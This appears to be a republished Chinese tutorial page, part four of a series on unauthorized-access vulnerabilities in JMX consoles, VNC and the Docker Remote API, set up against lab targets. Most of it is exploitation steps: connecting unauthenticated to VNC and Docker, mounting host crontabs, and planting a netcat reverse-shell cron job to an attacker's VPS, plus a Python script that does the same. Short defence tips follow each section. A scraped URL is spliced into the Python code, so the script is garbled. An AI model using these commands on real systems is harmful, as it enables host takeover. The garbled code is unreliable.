江苏龙网

  1. 主页 > 生活百科 > >

黑客最喜欢的常见未授权访问漏洞系( 四 )

漏洞


文章插图
 
成功上传木马

黑客最喜欢的常见未授权访问漏洞系

文章插图
 
访问http://192.168.18.129:8080/shell/
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
</ip>
防御手段-对jmx控制页面访问添加访问验证 。-进行JMX Console 安全配置 。
VNC 未授权访问漏洞漏洞简介以及危害  VNC 是虚拟网络控制台Virtual Network Console的英文缩写 。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发 。VNC是基于 UNXI 和 linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成 。VNC 默认端口号为 5900、5901 。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制target主机 。
漏洞利用环境介绍目标靶机: Windows Server 2003 Standard Editionip地址: 192.168.15.8环境搭建下载地址:https://archive.realvnc.com/download/open/4.0/进行安装(一直下一步即可)
黑客最喜欢的常见未授权访问漏洞系

文章插图
 

黑客最喜欢的常见未授权访问漏洞系

文章插图
 
未授权访问测试vncviewer 192.168.15.8
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
防御手段-配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码 。-以最小普通权限身份运行操作系统 。
Docker 未授权访问漏洞漏洞简介以及危害  Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器 。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker 。  Docker Remote API 是一个取代远程命令行界面(rcli)的REST API 。存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API,通过这个接口,我们可以新建 container,删除已有 container,甚至是获取宿主机的 shell 。
漏洞利用环境介绍目标靶机: Kaliip地址: 192.168.15.5连接工具:Xshell环境搭建# 下载环境mkdir dockercd docker wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfilewget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.ymlwget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh#或者利用DownGit下载https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rceDownGit网址:https://minhaskamal.github.io/DownGit/#/home
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
chmod 777 docker-entrypoint.sh # 给docker-entrypoint.sh权限docker-compose build && docker-compose up -d # 编译并启动环境
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
未授权访问测试docker -H tcp://192.168.15.5:2375 version
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
通过crontab反弹宿主机shell# vps监听9999端口nc -lvnp 9999
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
# 启动容器docker -H tcp://192.168.15.5:2375 run -id -v /etc/crontabs:/tmp alpine:latestdocker -H tcp://192.168.15.5:2375 ps
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
docker -H tcp://192.168.15.5:2375 exec -it a8ff7ed880fb sh # 进入容器
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务cat /tmp/root # 查看/tmp/root 文件exit #退出容器
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
反弹宿主机shell
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
还有其他比如写入ssh公钥等利用方式,方式方法都是大同小异的,这里就不再介绍了 。
也可以直接利用Python脚本
import dockerclient = docker.DockerClient(base_url='http://{target_ip}:2375/')data = https://www.isolves.com/it/aq/fwq/2020-07-29/client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})


推荐阅读


上一篇:好茶种植知识,四川民俗中的茶俗谚语介绍

下一篇:喝白沙绿茶有什么功效,夏天喝什么茶叶最好